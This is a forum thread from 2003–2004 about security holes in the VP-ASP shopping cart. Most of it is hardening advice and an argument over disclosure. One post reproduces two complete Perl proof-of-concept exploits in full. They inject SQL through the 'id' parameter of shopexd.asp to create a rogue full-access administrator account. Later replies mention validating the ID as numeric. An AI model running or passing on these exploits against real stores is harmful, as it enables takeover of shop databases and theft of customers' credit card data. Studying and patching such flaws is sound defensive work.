Author |
Topic |
|
Uneeeq
Starting Member
1 Posts |
Posted - February 06 2003 : 10:42:19
|
Hi all,
I do not have a store, but thought that those who do might want to be aware : This is from a list post this morning:
QUOTE: I recently intercepted an email from an Indonesian guy.
That email contained a whole list of online shops (URLs) that use the VP-ASP Shopping cart software. (see http://www.vpasp.com)
For all the shops mentioned in that list they had the correct admin password and login name. This means that shopping cart software is extremely vulnerable for hacking ! It seems easy to download the databases from such a shopping cart system which includes all customer info, creditcard numbers and so on...
If you are using this software I suggest you secure it immediately because they are watching you !
UNQUOTE
I was not even aware of this shopping cart software, there are so many out there... but for what it's worth, I fugured will post this so you all can secure your databases, CHANGE YOUR PASSWORDS! Best Regards Genie Livingstone
|
|
Cam
VP-CART Super User
Australia
361 Posts |
Posted - February 06 2003 : 16:21:28
|
Thanks Uneeeq,
VPASP is vulnerable if 3 things are not done and a lot of carts are in this situation. The same goes for our YourVitualStore customers.
Firstly, if the shopdbtest.asp and the shopa_sessionlist.asp pages are not either deleted or renamed a hacker can use them to discover the location of your database.
Secondly if you do not change your username and password from the default VPASP ones hackers can simply waltz into your store.
Thirdly the database that comes with VPASP is not in a secure directory. This needs to be done. Your host can set up a folder that is either "off-web", and inaccessible to web brosers, or protect a folder that is part of your web site so that HTTP access is blocked.
If this is not done the hacker can simply innsert the path to the db and download at his leisure.
These points are in the help notes and should be followed immediately before your site goes live.
It has also been mentioned on numerous posts as well.
Protect yourself!!!
Cheers Cam,
************************************* Cam Flanigan YourVirtualStore Sales e-mail: http://www.vpasp.com/sales/shopcustcontact.asp web: http://www.yourvirtualstore.net Build you own YourVirtualStore!!! www.yourvirtualstore.net ************************************* |
|
|
Cam
VP-CART Super User
Australia
361 Posts |
Posted - February 10 2004 : 09:15:02
|
This was a post I made a year ago.
A few changes to make it relevant.
The new pages to delete are:
diag_dbtest.asp diag_sessionlist.asp
any file starting with covert_
Make sure you place your db in a secure folder that is set up by your web host. You can test this by inserting the name of your db into the browser address bar. If you can download your database then it isn't secure.
For example:
http://www.yoursite.com/database/shopping500.mdb
Change the above to match your database location.
Change your shoplogin.asp name to something unique.
Update your Administration Security to accept the new name.
Change the xshopid setting in shop$config.asp to something unique to your site.
Set xshowadmin to NO in the admin so if hackers insewrt shopadmin1.asp into the address bar they are simply returnewd to the default page rather than the admin login page.
Read and implement all VPASP security notices.
Just had a number of our customers let us know that they have been having unwelcome visitors so thought it timely to repost this basic information.
Cheers, Cam
************************************* Cam Flanigan YourVirtualStore Sales e-mail: http://www.vpasp.com/sales/shopcustcontact.asp web: http://www.yourvirtualstore.net Build you own YourVirtualStore!!! www.yourvirtualstore.net ************************************* |
|
|
ljr0
Starting Member
4 Posts |
Posted - February 19 2004 : 19:57:25
|
I hate to say it, but shopexd.asp is wide open. It's so easy to give yourself admin access to the database or run any sql insertion code from this page it is almost pathetic.
I'm glad I put in your 2 password security. After doing everything you recommended, I still got hacked. I'm very concerned about the security of this software. We have had several credit card informations stolen and even after applying your patches I'm still getting hacked.
Please quit pretending it's not there and fix it.
|
|
|
support
Administrator
4679 Posts |
|
ljr0
Starting Member
4 Posts |
Posted - February 20 2004 : 09:03:12
|
If you don't know about this one, then I'm not sure that sending you how I "think" there is a hole would do any good.
I did a search on Google about hacking and vp-asp. I came up with a nice list of big open holes. One company out there even shows exactly how to exploit your shopping software.
It wouldn't take a rocket scientist to figure out how to further exploit that hole. If you don't know about the obvious ones and you want me to "show" you what everyone BUT you knows about, then why bother? It almost seems painfully obvious you don't want to know about it.
By-the-way, the company listing your open door also said they notified you about the problem and got no response. What does that say about your interest in fixing up the security??
|
|
|
siraj
VP-CART New User
USA
194 Posts |
Posted - February 20 2004 : 13:59:29
|
Hi ljr0, I dont know wheather you are trying to help or hack. If you really a VP-ASP user and know the holes in the software, you can post the solutions or problem or email to support. They will ,of course, take care of that. If you are just browsing the google to find how to hack VP-ASP, and alerting the rest of users to be paranoid, what is the use of it and what is your point? GOOD LUCK. SJ.
[email protected] |
|
|
ljr0
Starting Member
4 Posts |
Posted - February 20 2004 : 16:35:58
|
Why should I send my little info to support if they can't take the time to find out for themselves where the holes are? The fact that someone has already told them where the hole is (and the hole is still there), is sufficient reason for me to raise concerns that the developers of this software either don't care or don't know how to figure it out.
If I'm paying for a product, then they should have the resources to find these things and get them fixed. But maybe you don't agree with that.
I'll send the code clip that has the open hole. But I doubt I will ever hear from them on how to fix the problem even though I'm a customer. That really torques me off too.
|
|
|
siraj
VP-CART New User
USA
194 Posts |
Posted - February 20 2004 : 20:43:01
|
ljr0, I did not mean to say I dont agree with you. If there is holes, of course, need fix. My point is, we can facilitates them to find out sooner by providing the sources. More you wait, more risk we take. You can be generosus enough to send the code or point where the problem is, then I hope the VP-ASP users will appreciate you even though if not the vendors. Hope you will understand. GOOD LUCK. SJ.
[email protected] |
|
|
entropy4zo
Starting Member
3 Posts |
|
entropy4zo
Starting Member
3 Posts |
Posted - February 24 2004 : 00:42:33
|
F*** it heres the the whole thing Exploits/POC: by Bosen -------- #!/usr/bin/perl -w $pamer = " 1ndonesian Security Team (1st) ============================== tio-fux.pl, vpasp SQL Injection Proof of Concept Exploit by : Bosen & TioEuy Discover by : TioEuy, AresU Greetz to : AresU, syzwz (ta for da ipod), TioEuy, sakitjiwa, muthafuka all #hackers\@centrin.net.id/austnet.org http://bosen.net/releases/ "; # shut up ! we're the best in our country :)
use LWP::UserAgent; # LWP Mode sorry im lazy :) use HTTP::Request; use HTTP::Response; $| = 1; print $pamer; if ($#ARGV<3){ print "\n Usage: perl tio-fux.pl <uri> <prod-id> <user> <password> \n\n"; exit; } my $biji = "1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29"; $tio = "$ARGV[0]/shopexd.asp?id=$ARGV[1]"; $tio .= ";insert into tbluser (\"fldusername\",\"fldpassword\",\"fldaccess\") "; $tio .= "values ('$ARGV[2]','$ARGV[3]','$biji')--";
my $bosen = LWP::UserAgent->new(); my $gembel = HTTP::Request->new(GET => $tio); my $dodol = $bosen->request($gembel); if ($dodol->is_error()) { printf " %s\n", $dodol->status_line; } else { print "Tuing !\n"; } print "\n680165\n"; --END--
by Aresu -------- #!/usr/bin/perl # PRIVATE***PRIVATE***PRIVATE***PRIVATE***PRIVATE***PRIVATE***PRIVATE # 1ndonesian Security Team (1st) # ============================== # VP-ASP Shopping Cart - Exploit # Discover by : TioEuy & AresU; # Greetz to: syzwz (ta for da ipod), Bosen, sakitjiwa, muthafuka all # [email protected]/austnet.org, #[email protected] # http://bosen.net/releases/ use Socket;
$dodolbasik = "tioeuy.pl, VPASP exploit by TioEuy&AresU "; $aksesnya ="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29"; $pieldnya = '"fldusername","fldpassword","fldaccess"';
if ($#ARGV<4) { print "\n$dodolbasik"; print "\n\n Usage: perl tioeuy.pl <server> <full path> <id> <user> <password> \n\n"; exit; } $kupret="$ARGV[1]shopexd.asp?id=$ARGV[2];insert into tbluser ($pieldnya) values ('$ARGV[3]','$ARGV[4]','$aksesnya')--"; $kupret=~s/\ /%20/g; $kupret="GET $kupret HTTP/1.0\r\nHost: $ARGV[0]\r\n\r\n"; print $kupret;
$port=80; $host=$ARGV[0]; $target = inet_aton($host); @hasil=sendraw($kupret); print $gembel; print @hasil;
# ------------- Sendraw - thanx RFP [email protected] sub sendraw { # this saves the whole transaction anyway my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_;} select(STDOUT); close(S); return @in; } } --END--
Vendor Response: Contacted. No response.
Recommendation: No recommendation for this.
1ndonesian Security Team (1st) Advisory: http://bosen.net/releases/
About 1ndonesian Security Team: 1ndonesian Security Team, research and develop intelligent, advanced application security assessment. Based in Indonesia, 1ndonesian Security Team offers best of breed security consulting services, specialising in application, host and network security assessments.
1st provides security information and patches for use by the entire 1st community.
This information is provided freely to all interested parties and may be redistributed provided that it is not altered in any way, 1st is appropriately credited and the document retains.
Greetz to: Bosen, sakitjiwa, muthafuka, alphacentury, Gembul, syzwz, Heltz, TomIngShUu, riico, w4n, negative All 1ndonesian Security Team - #[email protected]/centrin.net.id
AresU <[email protected]> ====================== Original document can be fount at http://www.bosen.net/releases/?id=41
|
|
|
GTM
VP-CART New User
USA
122 Posts |
|
jsbeads
Starting Member
USA
39 Posts |
Posted - March 02 2004 : 08:58:37
|
That easy just test to see if ID is numeric. Just like the fixes say.
|
|
|
ProductivePC
VP-CART New User
USA
199 Posts |
Posted - March 29 2004 : 14:56:38
|
ljr0,
It is very obvious that you are not a programmer and do not understand security issues. What operating system do you use for your computer? Windows? Do you know how many security issues there are with that? How many loopholes. The people at VPASP have taken great pains to make sure that every REPORTED security flaw is taken care of right away. Let Microslop tell you that.
Whenever you program something there are ALWAYS bugs in the programming. You work through those bugs and fix them as they come about. That is what is called a debugging process. To expect that a programmer will know all aspects of every security flaw for every type of language that can be used to implement one is ludicrous and unreasonable.
This is why every program out there depends on people to find them and turn them in in order to fix them. Your AOL version that you are using to sign onto the Internet with right now.... it too has flaws and damages the Microslop OS registry and can be hacked easier than eating Apple Pie however AOL depends on you reporting that to them in order to fix it.
Same thing with MS OS. Same thing with Linux Bugs. Same thing with almost any piece of software out there. At least VPASP is willing to hear your request and fix it..... you should be thankful of that. Most of the other shopping carts wouldn't even go that far. They would consider you just a fly on the wall and not even want to speak or hear from you because you are not as intelligent as them (in their mind) Fortunately enough, VPASP developers are not like that.
As for contacting the people. EVERY e-mail, without fail, that I have ever sent to VPASP has been returned by a person with a personalized thank you note and not by an auto responder. I consider that phenomenal service! How easy is it for me to say I sent an e-mail to ljr0 and I did not get a return. Hey look guys, I wrote it in a forum post... it must be true! Here let me write it again. I sent an e-mail to ljr0 talking about this post and have not gotten a return therefore he must not be interested in responding or fixing his posts. We see how far that goes!
However; instead of making the problem worse you could have saved us all the aggravation and time and just let them know off the bat what the security loophole was that YOU were concerned about. At the point of time that you refused to mention it, you were no longer part of the solution you now became part of the problem!
Well, that is my two cents. Sorry if that is a little rough for your forums Howard; however I have seen the pains you all have taken to get this cart where it needs to be and I have seen the many posts help many people and I have seen the security fixes work.
Wayne www.WorldFamousGiftBaskets.net
Edited by - ProductivePC on March 29 2004 14:59:58 |
|
|
|
Topic |
|